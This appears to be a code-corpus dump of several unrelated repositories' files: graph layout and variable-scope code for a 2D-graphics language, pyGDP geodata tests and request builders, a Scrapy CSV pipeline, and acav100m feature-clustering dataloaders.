for v_to in list(self.relation_matrix_horizontal[v_from].keys()):
if v_to == vertex_to_replace:
rel = self.relation_matrix_horizontal[v_from][v_to]
self.add_relation(v_from=v_from, v_to=new_vertex, r=rel)
if rel != Relation.UNRELATED:
v_from.add_neighbour(new_vertex, rel)
v_from.remove_neighbour(vertex_to_replace)
self.relation_matrix_horizontal[v_from].pop(vertex_to_replace)
for v_from in self.relation_matrix_vertical.keys():
if v_from != new_vertex and v_from in self.vertices.keys():
for v_to in list(self.relation_matrix_vertical[v_from].keys()):
if v_to == vertex_to_replace:
rel = self.relation_matrix_vertical[v_from][v_to]
self.add_relation(v_from=v_from, v_to=new_vertex, r=rel)
if rel != Relation.UNRELATED:
v_from.add_neighbour(new_vertex, rel)
v_from.remove_neighbour(vertex_to_replace)
self.relation_matrix_vertical[v_from].pop(vertex_to_replace)
# Remove from graph in general
self.vertices.pop(vertex_to_replace)
# Remove from horizontal graph
self.relation_matrix_horizontal.pop(vertex_to_replace)
self.relation_matrix_horizontal[new_vertex].pop(vertex_to_replace)
# Remove from vertical graph
self.relation_matrix_vertical.pop(vertex_to_replace)
self.relation_matrix_vertical[new_vertex].pop(vertex_to_replace)
def _copy_contents(self, vertex_to_replace: Vertex, new_vertex: Vertex):
new_vertex.bb_w = vertex_to_replace.bb_w
new_vertex.bb_h = vertex_to_replace.bb_h
new_vertex.updated = vertex_to_replace.updated
new_vertex.drawn = vertex_to_replace.drawn
new_vertex.content = vertex_to_replace.content
# TODO: add IN relation
relation_set_pairs = zip(
[new_vertex.LEFT, new_vertex.RIGHT, new_vertex.TOP, new_vertex.BOT,
new_vertex.CONTAINED, new_vertex.ON, new_vertex.UNDER],
[vertex_to_replace.LEFT, vertex_to_replace.RIGHT, vertex_to_replace.TOP, vertex_to_replace.BOT,
vertex_to_replace.CONTAINED, vertex_to_replace.ON, vertex_to_replace.UNDER]
)
for new_relation, replaced_relation in relation_set_pairs:
if new_relation is not None:
new_relation.update(replaced_relation)
else:
new_relation = replaced_relation
new_vertex.uid = vertex_to_replace.uid
new_vertex.graph = vertex_to_replace.graph
new_vertex.adjust_size_based_on_shape()
@property
def disconnected(self):
if len(self.vertices) == 0:
raise StopIteration("No vertices in this graph")
visited = OrderedDict()
tbv = OrderedDict() # To Be Visited
any_v, _ = self.vertices.copy().popitem()
tbv[any_v] = None # Take any element of the graph
while len(tbv) > 0:
curr, _ = tbv.popitem()
visited[curr] = None
for n in curr.neighbours:
if n not in visited.keys() and n not in tbv.keys():
tbv[n] = None
return len(visited.keys()) != len(self.vertices.keys())
def _draw_vertex(self, v: Vertex, from_caller=False):
# TODO: Draw all neighbours and neighbours' neighbours etc.
"""
Basic algo:
1. Go "up" (check the IN reference) until you reach the root of the graph
NOTE: When adding a neighbour A to a Vertex B CONTAINED in some shape X, you should add "A IN X" relation automatically as well
2. Draw root shape parent_graphX
3. Call algo for each of X's neighbours until there are no neighbours to draw
:param v:
:param from_caller:
:return:
"""
if v.drawn:
return
self.svg_elem.add(v.content)
v.drawn = True
if from_caller:
for n in v.neighbours:
self._draw_vertex(n, from_caller=True)
def export_as_vertex(self) -> Vertex:
if self.disconnected:
raise DisconnectedGraphException(
f"Some shapes have no clear relations to each other. Aborting drawing\n{self.relation_matrix_horizontal=}\n{self.relation_matrix_vertical=}")
self.sort_horizontal()
self.sort_vertical()
self.content_center_in_self()
for v in self.vertices.keys():
v.center_if_legal()
for v in self.vertices.keys():
self.svg_elem.add(v.content)
return Vertex(content=self.svg_elem.copy())
def draw(self, canvas, caller_vertex: Vertex = None):
"""
:param canvas:
:param caller_vertex: In 2Dim you can draw a graph itself via Graph.draw(), or Graph.draw() can be called by its child vertex; in latter case only the vertices connected to caller or its neighbours or their neighbours etc. are drawn
:return:
"""
if self.disconnected:
raise DisconnectedGraphException(
f"Some shapes have no clear relations to each other. Aborting drawing\n{self.relation_matrix_horizontal=}\n{self.relation_matrix_vertical=}")
self.sort_horizontal()
self.sort_vertical()
self.content_center_in_self()
for v in self.vertices.keys():
v.center_if_legal()
if caller_vertex is not None:
# Only draw vertices connected to the caller of Graph.draw()
self._draw_vertex(caller_vertex, from_caller=True)
else:
# Draw all vertices (might produce a disjointed graph)
for v in self.vertices.keys():
self._draw_vertex(v, from_caller=False)
canvas.add(self.svg_elem)
canvas.save()
```
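The cycle detection above is what rejects contradictory layouts; a hedged sketch of that behaviour (the shape type and sizes are illustrative only):
```python
from graph import Graph, Vertex, Relation
from exceptions import CyclicRelationsException

g = Graph()
a, b, c = (Vertex(shape='rect', args=['20%', '20%']) for _ in range(3))
for v in (a, b, c):
    g.add_vertex(v)

g.add_relation(a, b, Relation.LEFT)
g.add_relation(b, c, Relation.LEFT)
try:
    g.add_relation(c, a, Relation.LEFT)  # would close the loop a LEFT b LEFT c LEFT a
except CyclicRelationsException as e:
    print('rejected:', e)
```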
#### File: Language-for-2D-graphics/twodim_compiler/VariablesTree.py
```python
import treelib
from exceptions import VariableNotFoundError
class VariablesTree:
def __init__(self):
self.tree = treelib.Tree()
self.tree.create_node(tag="GlobalVars", identifier="GlobalVars")
def add_variable(self, tag, name, content, scope=None):
'''
:param name: name of the variable added
:param content: Vertex or Graph representing the variable
:param scope: name of the function the variable is being created in or None in case it's a global variable
'''
if scope is None:
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid="GlobalVars"), data=content)
return
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid=scope), data=content)
def add_scope_subtree(self, tag, name, scope=None):
'''
:param name: name of the variable added
:param scope: name of the function the variable is being created in or None in case it's a global variable
'''
if scope is None:
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid="GlobalVars"))
return
self.tree.create_node(tag=tag, identifier=name, parent=self.tree.get_node(nid=scope))
def find_var_by_tag(self, tag, scope=None):
'''
:param tag: tag(name) of the variable
:param scope: the most inner scope to look in (nid)
:return: data from a node of the variable tree or raise exception
'''
if scope is None:
scope = self.tree.root
scope_vars = self.tree.children(scope)
vars_found = list(filter(lambda x: x.tag == tag, scope_vars))
while len(vars_found) == 0 and self.tree.parent(scope) is not None:
scope = self.tree.parent(scope).identifier
scope_vars = self.tree.children(scope)
vars_found = list(filter(lambda x: x.tag == tag, scope_vars))
if len(vars_found) == 0:
raise VariableNotFoundError(f"Failed to find variable \"{tag}\". Variable name \"{tag}\" contains"
f" a typo or the variable is unavailable from this scope.")
return vars_found[0]
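if __name__ == "__main__":
    # Hedged usage sketch: the scope name "main" and the tags/contents below are
    # illustrative only. Lookups resolve from the given scope upward to GlobalVars.
    vt = VariablesTree()
    vt.add_variable(tag="a", name="uid-a", content="vertex-a")              # global variable
    vt.add_scope_subtree(tag="main", name="main")                           # a function scope
    vt.add_variable(tag="b", name="uid-b", content="vertex-b", scope="main")
    assert vt.find_var_by_tag("b", scope="main").data == "vertex-b"         # found in "main"
    assert vt.find_var_by_tag("a", scope="main").data == "vertex-a"         # falls back to GlobalVars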
``` |
{
"source": "jiwalker-usgs/pyGDP",
"score": 2
} |
#### File: Lettuce_Tests/features/Test_Feature_OPenDAP.py
```python
import pyGDP
import os
from lettuce import *
from nose.tools import assert_equal
@step(r'I already have my boundary shapefile call from GDP')
def alabama_conus_area(step):
world.shapefile = 'sample:CONUS_states'
world.attribute = 'STATE'
world.value = 'Alabama'
@step(r'I have set up my precipitaion data call from GDP')
def dataset_call(step):
world.dataSetURI = 'dods://cida.usgs.gov/thredds/dodsC/gmo/GMO_w_meta.ncml'
world.dataType = 'Prcp'
world.timeStart = '1950-01-01T00:00:00.000Z'
world.timeEnd = '1950-01-02T00:00:00.000Z'
@step(r'I run submitFeatureCoverageOPenDAP in pyGDP')
def test_FCO(step):
test_pyGDP = create_web_processing_object()
world.output_file = test_pyGDP.submitFeatureCoverageOPenDAP(world.shapefile, world.dataSetURI, world.dataType, world.timeStart, world.timeEnd, world.attribute, world.value, verbose=False, outputfname='testOPenDAP_testfile_test', sleepSecs=15)
def create_web_processing_object():
new_web_processing = pyGDP.pyGDPwebProcessing()
return new_web_processing
@step(r'I know my output is something I expect')
def check_FCO_output(step):
assert_equal(os.path.getsize(world.output_file), 14312)
```
#### File: Lettuce_Tests/features/Test_Namespaces.py
```python
import pyGDP
from urlparse import urlparse
import httplib
from lettuce import *
#All the global variables in pyGDP:
@step(r'Given I have all my namespaces defined in pyGDP')
def define_those_namespaces(step):
world.name_spaces = [
'upload_URL' ,\
'WPS_URL' ,\
'WPS_Service' ,\
'CSWURL' ,\
'WPS_DEFAULT_NAMESPACE' ,\
'WPS_DEFAULT_SCHEMA_LOCATION' ,\
'WPS_DEFAULT_VERSION' ,\
'WFS_NAMESPACE' ,\
'OGC_NAMESPACE' ,\
'GML_NAMESPACE' ,\
'GML_SCHEMA_LOCATION' ,\
'DRAW_NAMESPACE' ,\
'SMPL_NAMESPACE' ,\
'UPLD_NAMESPACE' ,\
'CSW_NAMESPACE'
]
@step(r'And that each namespace points to a working URL or part of an XML')
def check_populated_namespaces(step):
for space in world.name_spaces:
assert(space != None)
@step(r'When I check the http response from each url')
def check_those_responses(step):
world.responses = []
for x in range(len(world.name_spaces)):
to_evaluate = 'pyGDP.'+world.name_spaces[x]
world.responses += [[to_evaluate, server_status_is_good(eval(to_evaluate))[1]]]
@step(r'Then I get a working response for each one')
def check_responses(step):
for response in world.responses:
print response[0] + ': ' + str(response[1])
assert response[1] == True
def server_status_is_good(url):
host, path = urlparse(url)[1:3]
try:
connection = httplib.HTTPConnection(host)
connection.request('HEAD',path)
response = connection.getresponse().status
if response > 400:
            return url, False
return 'Good', True
except StandardError:
return url, True
def print_status():
for x in range(len(name_spaces)):
to_evaluate = 'pyGDP.'+name_spaces[x]
print to_evaluate + ':',
print server_status_is_good(eval(to_evaluate))[0]
```
#### File: pyGDP/pygdp/fwgs.py
```python
from pygdp import _execute_request
from pygdp import _get_geotype
from owslib.util import log
def submitFeatureWeightedGridStatistics(geoType, dataSetURI, varID, startTime, endTime, attribute, value, gmlIDs,
verbose, coverage, delim, stat, grpby, timeStep, summAttr, weighted, WFS_URL, outputfname, sleepSecs):
"""
Makes a featureWeightedGridStatistics algorithm call.
The web service interface implemented is summarized here:
https://my.usgs.gov/confluence/display/GeoDataPortal/Generating+Area+Weighted+Statistics+Of+A+Gridded+Dataset+For+A+Set+Of+Vector+Polygon+Features
Note that varID and stat can be a list of strings.
"""
# test for dods:
dataSetURI = _execute_request.dodsReplace(dataSetURI)
log.info('Generating feature collection.')
featureCollection = _get_geotype._getFeatureCollectionGeoType(geoType, attribute, value, gmlIDs, WFS_URL)
if featureCollection is None:
return
processid = 'gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm'
if weighted==False:
processid = 'gov.usgs.cida.gdp.wps.algorithm.FeatureGridStatisticsAlgorithm'
solo_inputs = [("FEATURE_ATTRIBUTE_NAME",attribute),
("DATASET_URI", dataSetURI),
("TIME_START",startTime),
("TIME_END",endTime),
("REQUIRE_FULL_COVERAGE",str(coverage).lower()),
("DELIMITER",delim),
("GROUP_BY", grpby),
("SUMMARIZE_TIMESTEP", str(timeStep).lower()),
("SUMMARIZE_FEATURE_ATTRIBUTE",str(summAttr).lower()),
("FEATURE_COLLECTION", featureCollection)]
if isinstance(stat, list):
num_stats=len(stat)
if num_stats > 7:
raise Exception('Too many statistics were submitted.')
else:
num_stats=1
if isinstance(varID, list):
num_varIDs=len(varID)
else:
num_varIDs=1
inputs = [('','')]*(len(solo_inputs)+num_varIDs+num_stats)
count=0
rmvCnt=0
for solo_input in solo_inputs:
if solo_input[1]!=None:
inputs[count] = solo_input
count+=1
else:
rmvCnt+=1
del inputs[count:count+rmvCnt]
if num_stats > 1:
for stat_in in stat:
if stat_in not in ["MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"]:
raise Exception('The statistic %s is not in the allowed list: "MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"' % stat_in)
inputs[count] = ("STATISTICS",stat_in)
count+=1
elif num_stats == 1:
if stat not in ["MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"]:
raise Exception('The statistic %s is not in the allowed list: "MEAN", "MINIMUM", "MAXIMUM", "VARIANCE", "STD_DEV", "SUM", "COUNT"' % stat)
inputs[count] = ("STATISTICS",stat)
count+=1
if num_varIDs > 1:
for var in varID:
inputs[count] = ("DATASET_ID",var)
count+=1
elif num_varIDs == 1:
inputs[count] = ("DATASET_ID",varID)
output = "OUTPUT"
return _execute_request._executeRequest(processid, inputs, output, verbose, outputfname, sleepSecs)
```
#### File: pyGDP/pygdp/_webdata_xml_generate.py
```python
from owslib.wps import WebProcessingService
from StringIO import StringIO
from owslib.etree import etree
from GDP_XML_Generator import gdpXMLGenerator
from pygdp import _execute_request
import sys
from pygdp.namespaces import WPS_Service
def _generateRequest(dataSetURI, algorithm, method, varID, verbose):
"""
Takes a dataset uri, algorithm, method, and datatype. This function will generate a simple XML document
to make the request specified. (Only works for ListOpendapGrids and GetGridTimeRange).
Will return a list containing the info requested for (either data types or time range).
"""
POST = WebProcessingService(WPS_Service, verbose=verbose)
xmlGen = gdpXMLGenerator()
root = xmlGen.getXMLRequestTree(dataSetURI, algorithm, method, varID, verbose)
request = etree.tostring(root)
execution = POST.execute(None, [], request=request)
_execute_request._check_for_execution_errors(execution)
if method == 'getDataSetTime':
seekterm = '{xsd/gdptime-1.0.xsd}time'
elif method == 'getDataType':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}name'
elif method == 'getDataLongName':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}description'
elif method == 'getDataUnits':
seekterm = '{xsd/gdpdatatypecollection-1.0.xsd}unitsstring'
return _parseXMLNodesForTagText(execution.response, seekterm)
def _parseXMLNodesForTagText(xml, tag):
"""
Parses through a XML tree for text associated with specified tag.
Returns a list of the text.
"""
tag_text = []
for node in xml.iter():
if node.tag == tag:
tag_text.append(node.text)
return tag_text
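# Hedged sketch of _parseXMLNodesForTagText on a hand-built tree (tag and value illustrative):
#   xml = etree.fromstring('<r xmlns="xsd/gdptime-1.0.xsd"><time>1950-01-01</time></r>')
#   _parseXMLNodesForTagText(xml, '{xsd/gdptime-1.0.xsd}time')  ->  ['1950-01-01']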
``` |
{
"source": "Jiwan88/Web-Scraping",
"score": 2
} |
#### File: University Data/UniversityScraper/pipelines.py
```python
from scrapy.exporters import CsvItemExporter
from scrapy import signals
class UniversityscraperPipeline(object):
def __init__(self):
self.files = {}
@classmethod
def from_crawler(cls, crawler):
pipeline = cls()
crawler.signals.connect(pipeline.spider_opened, signals.spider_opened)
crawler.signals.connect(pipeline.spider_closed, signals.spider_closed)
return pipeline
def spider_opened(self, spider):
output_file = open(str(spider.name)+'.csv', 'a+b')
self.files[spider] = output_file
self.exporter = CsvItemExporter(output_file)
self.exporter.fields_to_export = ['course_name','category','sub_category','course_website','duration','duration_term','study_mode','degree_level','monthly_intake','intake_day','intake_month','apply_day','apply_month','city','domestic_only','international_fee','domestic_fee','fee_term','fee_year','currency','study_load','language','ielts_listening','ielts_speaking','ielts_writing','ielts_reading','ielts_overall','pte_listening','pte_speaking','pte_writing','pte_reading','pte_overall','toefl_listening','toefl_speaking','toefl_writing','toefl_reading','toefl_overall','english_test','reading','listening','speaking','writing','overall','academic_level','academic_score','score_type','academic_country','other_test','score','other_requirements','course_description','course_structure','career','scholarship']
self.exporter.start_exporting()
def spider_closed(self, spider):
self.exporter.finish_exporting()
output_file = self.files.pop(spider)
output_file.close()
def process_item(self, item, spider):
self.exporter.export_item(item)
return item
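# To enable this exporter (hedged sketch; the priority value is an assumption), register it
# in the project's settings.py:
#   ITEM_PIPELINES = {"UniversityScraper.pipelines.UniversityscraperPipeline": 300}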
``` |
{
"source": "JiwanChung/acav100m",
"score": 2
} |
#### File: code/data/clustering.py
```python
import pickle
import warnings
import random
from pathlib import Path
import torch
import webdataset as wds
from torch.utils.data import IterableDataset, DataLoader
from utils import identity, get_num_workers, to_str, load_pickle
from mps import distributed as du
from .shuffle import shuffle
from .pipeline import pipeline
from .shards import get_shards_size, get_shards_path
def get_clustering_dataloader(args, drop_last=False, shuffle=False, is_train=True):
# is_train: True when training centroids, False when assigning cluster labels
dataset, num_workers = get_dataset(args, is_train=is_train)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
dataloader = DataLoader(
dataset, batch_size,
shuffle=False, # shuffling in dataloader is meaningless for webdataset
num_workers=num_workers,
collate_fn=collate_features,
drop_last=drop_last)
return dataloader
def get_dataset(args, is_train=True):
shards_path, rest = get_shards_path(args, suffix='.pkl', f=get_shards_size, is_train=is_train)
data = FeatureDataset(args, shards_path, rest['all_shards_path'], is_train=is_train)
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
batch_size = int(args.data.batch_size / world_size)
num_workers = data.num_workers
effective_num_workers = 1 if num_workers == 0 else num_workers
shards_size_dt = rest['shards_size_dt']
shards_size = [shards_size_dt[Path(p).stem] for p in rest['all_shards_path']]
length = du.get_length(
shards_size, batch_size, num_workers, is_train=is_train,
)
print("(node {}) dataset size: {}".format(
du.get_rank(),
sum(du.node_selection(
shards_size, du.get_rank(),
total=world_size, is_train=is_train, no_str_ok=True))))
if du.get_rank() == 0:
print("dataset length: {}".format(length))
nominal = length * effective_num_workers
data = wds.ResizedDataset(
data,
length,
nominal,
)
return data, num_workers
def get_layer(array, layer):
if isinstance(array, dict):
return array[layer]
elif isinstance(array, list):
i = int(layer.split('_')[-1])
return array[i]
raise ValueError('feature array is not a dict nor a list!')
def collate_features(batch):
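    # Returns a dict keyed by "<extractor_name>/<dataset>" per model, where each value is
    # either a stacked feature tensor or a dict of per-layer tensors, plus the remaining
    # metadata fields passed through as lists and 'idx' (the filename stems).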
feature_names = ['video_features', 'audio_features']
pivot = batch[0]
res = {}
for key in pivot.keys():
if key in feature_names:
for i, _ in enumerate(pivot[key]):
if isinstance(pivot[key][i], dict): # layer extractor
pivot_array = pivot[key][i]['array']
feature = {}
if isinstance(pivot_array, dict):
layer_keys = list(pivot_array.keys())
elif isinstance(pivot_array, list):
layer_keys = [f'layer_{i}' for i in range(len(pivot_array))]
else:
raise ValueError('feature array is not a dict nor a list!')
for layer in layer_keys:
layer_feature = []
for row in batch:
try:
layer_feature.append(torch.from_numpy(get_layer(row[key][i]['array'], layer)))
except Exception as e:
print(f"{row['shard_name']} shard error: {e}")
raise Exception
layer_feature = torch.stack(layer_feature, dim=0)
feature[layer] = layer_feature
else:
feature = [torch.from_numpy(row[key][i]['array']) for row in batch]
feature = torch.stack(feature, dim=0)
model_key = (pivot[key][i]['extractor_name'], pivot[key][i]['dataset'])
model_key = '/'.join(model_key)
res[model_key] = feature
else:
res[key] = [row[key] for row in batch]
res['idx'] = [Path(row['filename']).stem for row in batch]
return res
class FeatureDataset(IterableDataset):
def __init__(self, args, shards_path, all_shards_path,
node_selection=identity, shard_shuffle=identity, is_train=True):
# is_train: True when training centroids, False when assigning cluster labels
# We need the list of paths to all input shards
# (after discarding if args.computation.discard_shards is set)
# Here, I'll refer to it as `all_shards_path`
self.shards_path = shards_path
self.all_shards_path = all_shards_path
if is_train:
if isinstance(args.computation.num_gpus, int):
world_size = min(du.get_world_size(), args.computation.num_gpus)
else:
world_size = du.get_world_size()
num_shards = [
len(du.node_selection(all_shards_path, i, total=world_size, is_train=is_train))
for i in range(world_size)
]
self.num_workers = min(
[args.computation.num_workers] + num_shards
)
else:
# Here, self.shards_path is the list of paths to shards allocated to current node (gpu)
# (after discarding if args.computation.discard_shards is set)
self.num_workers, _ = get_num_workers(
args.computation.num_workers, len(self.shards_path),
)
out_str = "#Workers of Feature Extraction Dataset"
out_str += f" (train={is_train}, node={du.get_rank()})"
out_str += f": {self.num_workers}"
print(out_str)
self.node_selection = node_selection
self.shard_shuffle = shard_shuffle
self.pipeline = []
def shard_fn(self):
urls = self.shards_path
urls = self.node_selection(urls)
urls = worker_urls(urls)
urls = self.shard_shuffle(urls)
return urls
def samples(self, urls):
if isinstance(urls, str):
urls = [urls]
assert isinstance(urls, list)
source = self.raw_samples(urls)
return pipeline(source, *self.pipeline)
def raw_samples(self, urls):
for url in urls:
url = Path(url)
try:
try:
pkl = load_pickle(url)
except EOFError as e:
print(e)
print('EOFError in shard loading: {}'.format(Path(url.stem)))
continue
for feature in pkl:
yield feature
except Exception as e:
print(e)
print('Exception in shard loading: {}'.format(Path(url.stem)))
continue
def __iter__(self):
urls = self.shard_fn()
return self.samples(urls)
def shuffle(self, size, rng=None, **kw):
"""Shuffle the data."""
if size == 0:
return self
if rng is None:
rng = random.Random()
self.rng = rng
self.shard_shuffle = Shuffler(rng)
self.pipeline.append(shuffle(size, rng=rng, **kw))
return self
class Shuffler:
"""Make a shuffle function (avoid nesting for pickle)."""
def __init__(self, rng):
self.rng = rng
def __call__(self, lst):
lst = list(lst)
self.rng.shuffle(lst)
return lst
def worker_urls(urls):
"""Selects a subset of urls based on Torch get_worker_info.
Used as a shard selection function in Dataset."""
import torch
assert isinstance(urls, list)
assert isinstance(urls[0], str)
worker_info = torch.utils.data.get_worker_info()
if worker_info is not None:
wid = worker_info.id
num_workers = worker_info.num_workers
if wid == 0 and len(urls) < num_workers:
warnings.warn("num_workers {} > num_shards {}".format(num_workers, len(urls)))
return urls[wid::num_workers]
else:
return urls
```
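The `worker_urls` helper above shards the URL list round-robin across PyTorch DataLoader workers (`urls[wid::num_workers]`). A minimal sketch of that slicing, with made-up shard names, just to show which worker sees which shards:
```python
# Round-robin shard split as in worker_urls above; shard names are hypothetical.
shards = [f"shard_{i:03d}.pkl" for i in range(5)]
num_workers = 3
for wid in range(num_workers):
    print(wid, shards[wid::num_workers])
# 0 ['shard_000.pkl', 'shard_003.pkl']
# 1 ['shard_001.pkl', 'shard_004.pkl']
# 2 ['shard_002.pkl']
```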
#### File: code/models/__init__.py
```python
import os
import inspect
from pathlib import Path
import torch
from torch import nn
from inflection import underscore
# models should be initialized before loading data
model_dict = {}
def add_models():
path = Path(os.path.dirname(__file__))
for p in path.glob('*.py'):
name = p.stem
parent = p.parent.stem
if name != "__init__":
__import__(f"{parent}.{name}")
module = eval(name)
for member in dir(module):
# Add to dict all nn.Module classes
member = getattr(module, member)
if hasattr(member, '__mro__') and \
nn.Module in inspect.getmro(member):
model_dict[underscore(str(member.__name__))] = member
def get_model_dict():
if not model_dict:
add_models()
return model_dict
def get_model_class(model_name, args):
if not model_dict:
add_models()
model_class = model_dict[model_name]
if hasattr(model_class, 'args'):
args = merge_args(args, model_class.args)
return model_class, args
def init_model(model_name, args):
model_class, args = get_model_class(model_name, args)
return model_class(args), args
def merge_args(args, model_args):
for k, v in model_args.items():
if k not in args:
args[k] = model_args[k]
return args
def get_model(model_name, args):
model, args = init_model(model_name, args)
model = model.to(args.computation.device)
if args.computation.num_gpus > 1:
cur_device = torch.cuda.current_device()
model = torch.nn.parallel.DistributedDataParallel(
module=model, device_ids=[cur_device], output_device=cur_device
)
return model, args
def download_model_weights(args):
model_names = sorted(args.models)
for model_name in model_names:
model_class, args = get_model_class(model_name, args)
if hasattr(model_class, 'download'):
model_class.download(args)
```
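`add_models` above populates `model_dict` by importing every module in the package and registering each `nn.Module` subclass under its underscored class name (via `inflection.underscore`). A minimal sketch of that keying, using a hypothetical class name rather than any real model in this package:
```python
# Sketch of the registry keying used by add_models; AudioResNet is a stand-in class.
from inflection import underscore
from torch import nn

class AudioResNet(nn.Module):
    pass

model_dict = {underscore(AudioResNet.__name__): AudioResNet}
print(model_dict)  # {'audio_res_net': <class '...AudioResNet'>}
```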
#### File: clustering/code/process_batch.py
```python
import numpy as np
from utils import to_device, dol_to_lod
def _train_batch(args, features, clusterings):
if isinstance(features, list):
features = {'layer_{}'.format(i): feature for i, feature in enumerate(features)}
if isinstance(features, dict):
# layer extractor
distance = [clustering.add(features[key].to(args.computation.device)) \
for key, clustering in clusterings.items()]
distance = np.array(distance).mean()
else:
distance = clusterings['model'].add(features.to(args.computation.device))
return distance
def train_batch(args, model, batch, options, clusterings):
batch = to_device(batch, args.computation.device)
data = batch['data']
# batch processing
features = model(data) # BC
distance = _train_batch(args, features, clusterings)
return distance
def train_batch_cached(args, batch, clusterings):
batch = to_device(batch, args.computation.device)
features = batch
distance = _train_batch(args, features, clusterings)
return distance
def _extract_batch(args, batch, features, clusterings):
if isinstance(features, list):
features = {'layer_{}'.format(i): feature for i, feature in enumerate(features)}
if isinstance(features, dict):
# layer extractor
features = {key: clustering.calc_best(features[key].to(args.computation.device))[0] \
for key, clustering in clusterings.items()}
features = {key: list(feature.detach().cpu().numpy()) for key, feature in features.items()}
features = dol_to_lod(features)
else:
features = clusterings['model'].calc_best(features.to(args.computation.device))[0]
features = list(features.detach().cpu().numpy())
features = [{'assignments': f} for f in features]
meta_keys = ['filename', 'shard_name', 'shard_size', 'idx']
metas = {k: batch[k] for k in meta_keys if k in batch}
metas = dol_to_lod(metas)
features = [{**meta, **feature} for meta, feature in zip(metas, features)]
return features
def extract_batch(args, model, batch, options, clusterings):
batch = to_device(batch, args.computation.device)
data = batch['data']
# batch processing
features = model(data) # BC
return _extract_batch(args, batch, features, clusterings)
def extract_batch_cached(args, meta, batch, clusterings):
batch = to_device(batch, args.computation.device)
return _extract_batch(args, meta, batch, clusterings)
```
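`_extract_batch` above depends on `dol_to_lod` from `utils` (not shown here) to turn a dict of per-key lists into a list of per-sample dicts before merging in the metadata. A minimal sketch of the assumed behaviour, not the project's actual implementation:
```python
# Assumed behaviour of utils.dol_to_lod: dict-of-lists -> list-of-dicts.
def dol_to_lod(dol):
    keys = list(dol.keys())
    length = len(dol[keys[0]])
    return [{k: dol[k][i] for k in keys} for i in range(length)]

metas = {'filename': ['a.mp4', 'b.mp4'], 'shard_name': ['s0', 's0']}
print(dol_to_lod(metas))
# [{'filename': 'a.mp4', 'shard_name': 's0'}, {'filename': 'b.mp4', 'shard_name': 's0'}]
```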
#### File: code/measures/dataloaders.py
```python
import math
import random
import copy
from itertools import chain
import torch
from utils import peek
def get_penultimates(keys):
penultimates = {}
for key in keys:
view = key[:key.find('_')] # get dataset+model name
layer_name = key[key.find('_') + 1:]
if view not in penultimates:
penultimates[view] = view + '_' + layer_name
        elif layer_name > penultimates[view][len(view) + 1:]:  # compare layer names, not the full stored key
penultimates[view] = view + '_' + layer_name
keys = sorted(list(penultimates.keys()))
return [penultimates[k] for k in keys]
class ClassDataLoader:
def __init__(self, data):
dataset, labels, num_iters = self.shuffle_dataset(data)
self.dataset = dataset
self.labels = labels
self.num_iters = num_iters
def shuffle_dataset(self, data):
dataset = {}
lengths = {}
for label, class_data in data.items():
class_data = copy.deepcopy(class_data)
random.shuffle(class_data)
lengths[label] = len(class_data)
dataset[label] = class_data
max_len = max(lengths.values())
self.batch_size = self.num_classes = len(data)
# num_iters = math.ceil(max_len / batch_size)
num_iters = max_len
labels = sorted(list(data.keys()))
return dataset, labels, num_iters
def gather_batch(self, i):
batch = [self.get_index(self.dataset[label], i) for label in self.labels]
return batch
def __iter__(self):
for i in range(self.num_iters):
batch = self.gather_batch(i)
batch = [self.format_row(row) for row in batch]
batch = zip(*batch) # zip by feature type
batch = [torch.stack(v, dim=0) for v in batch]
yield batch
def __len__(self):
return self.num_iters
def get_index(self, cset, i):
remainder = i % len(cset)
return cset[remainder]
def format_row(self, row):
penultimates = get_penultimates(list(row['features'].keys()))
return [row['features'][k] for k in penultimates]
class SampleDataLoader(ClassDataLoader):
def __init__(self, data, batch_size):
dataset = self.shuffle_dataset(data)
self.dataset = dataset
self.batch_size = batch_size
self.num_iters = math.ceil(len(self.dataset) / self.batch_size)
def shuffle_dataset(self, data):
data = list(chain(*data.values())) # ignore classes
random.shuffle(data)
return data
def gather_batch(self, i):
start = self.batch_size * i
end = self.batch_size * (i + 1)
batch = self.dataset[start: end]
return batch
class InferDataLoader(SampleDataLoader):
def __init__(self, data, batch_size):
self.dataset = self.get_dataset(data)
self.batch_size = batch_size
self.num_iters = math.ceil(len(self.dataset) / self.batch_size)
def get_dataset(self, data):
penultimates = get_penultimates(list(data.keys()))
dataset = []
for i in range(len(peek(data))):
features = {k: data[k][i] for k in penultimates}
row = {'features': features}
dataset.append(row)
return dataset
```
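`get_penultimates` above keeps, for each `dataset+model` view, the largest layer key (taken to be the penultimate layer) and returns the kept keys sorted by view. A small sketch of that selection rule with hypothetical keys of the form `<view>_<layer>`:
```python
# Hypothetical keys; only the intended selection rule is illustrated here.
keys = ['ucf-resnet_layer_2', 'ucf-resnet_layer_4', 'esc-vggish_layer_3']

by_view = {}
for key in keys:
    view, layer_name = key[:key.find('_')], key[key.find('_') + 1:]
    by_view.setdefault(view, []).append(layer_name)

penultimates = [view + '_' + max(layers) for view, layers in sorted(by_view.items())]
print(penultimates)  # ['esc-vggish_layer_3', 'ucf-resnet_layer_4']
```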
#### File: code/measures/efficient_pair.py
```python
import torch
from .efficient import EfficientMI
'''
pair-based scores
- Fowlkes–Mallows index
- Rand index
'''
def tensor_calc_combination(t, n=2):
device = t.device
dtype = t.dtype
t = t.cpu().numpy()
from scipy.special import comb
t = comb(t, n, exact=False)
return torch.from_numpy(t).round().to(dtype).to(device)
class FowlkesMallowsScore(EfficientMI):
def init_cache(self):
super().init_cache()
self.pair_stats = ['TP', 'FP', 'FN', 'TN']
P = len(self.combinations)
self.cache = {**self.cache, **{name: torch.full(tuple([P]), self.eps) for name in self.pair_stats}}
def add_samples(self, ids):
super().add_samples(ids) # W x P x C x C
self.init_pair_stats()
def init_pair_stats(self):
